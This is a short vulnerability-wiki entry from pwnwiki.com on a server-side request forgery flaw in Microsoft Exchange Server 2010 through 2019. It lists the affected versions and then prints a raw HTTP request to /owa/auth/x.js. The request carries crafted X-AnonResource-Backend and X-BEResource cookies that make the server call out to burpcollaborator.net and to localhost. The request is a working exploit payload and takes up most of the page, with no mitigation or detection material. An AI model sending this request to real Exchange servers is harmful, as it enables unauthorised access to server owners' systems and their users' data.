pwnwiki.com
,
Introduction to Vulnerability
Exchange server-side request forgery (SSRF) vulnerability, an attacker exploiting this vulnerability can send arbitrary HTTP requests and authenticate through Exchange Server.
Scope of influence
Microsoft Exchange Server: 2010
Microsoft Exchange Server: 2013
Microsoft Exchange Server: 2016
Microsoft Exchange Server: 2019
SSRF
GET /owa/auth/x.js HTTP/1.1 Host: 0.0.0.0 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; Accept-Language: en Connection: close
免费、自由、人人可编辑的漏洞库--pwnwiki.com